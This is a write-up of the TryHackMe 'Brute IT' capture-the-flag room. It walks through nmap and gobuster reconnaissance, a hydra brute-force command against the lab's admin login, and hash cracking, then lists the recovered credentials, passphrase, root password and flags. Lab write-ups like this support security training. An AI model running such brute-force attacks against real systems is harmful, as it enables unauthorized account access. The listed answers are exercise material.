Brute IT - TryHackMe

Learn how to brute-force, crack hashes and escalate privileges in this box!

[TryHackMe Brute IT](https://tryhackme.com/room/bruteit)

In this box you will learn about:

  • Brute-force
  • Hash cracking
  • Privilege escalation

Before attacking, let’s get information about the target.

Search for open ports using nmap, how many ports are open?

```
Desktop/TryHackMe/brut_it » nmap -A -vv 10.10.93.226 -oN nmap_result
```

```
2 ports are open.
```

What version of SSH is running?

```
OpenSSH 7.6p1
```

What version of Apache is running?

```
2.4.29
```

Which Linux distribution is running?

```
ubuntu
```

Search for hidden directories on web server, what is the hidden directory?

```
Desktop/TryHackMe/brut_it » gobuster -u 10.10.93.226 -w /opt/directory-list-2.3-medium.txt
```

```
# Hidden directory
/admin
```

Find a form to get a shell on SSH.

What is the user:password of the admin panel?

As you can see, the form data contains the user and password fields, so we can use them to brute-force the login with hydra.

Hidden message

```
# Hydra command (Pretty straightforward)
hydra -l admin -P /opt/rockyou.txt 10.10.93.226 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid"
```

```
# Credentials
admin:xavier
```

Crack the RSA key you found, what is John’s RSA Private Key passphrase?

```
# Password for the private key is
rockinroll
```

user.txt

```
THM{a_password_is_not_a_barrier}
```

Web flag

```
THM{brut3_f0rce_is_e4sy}
```

Find a form to escalate your privileges, what is the root’s password?

```
# Password for the root user
football
```

Root.txt

```
THM{pr1v1l3g3_3sc4l4t10n}
```

This post is licensed under CC BY 4.0 by the author.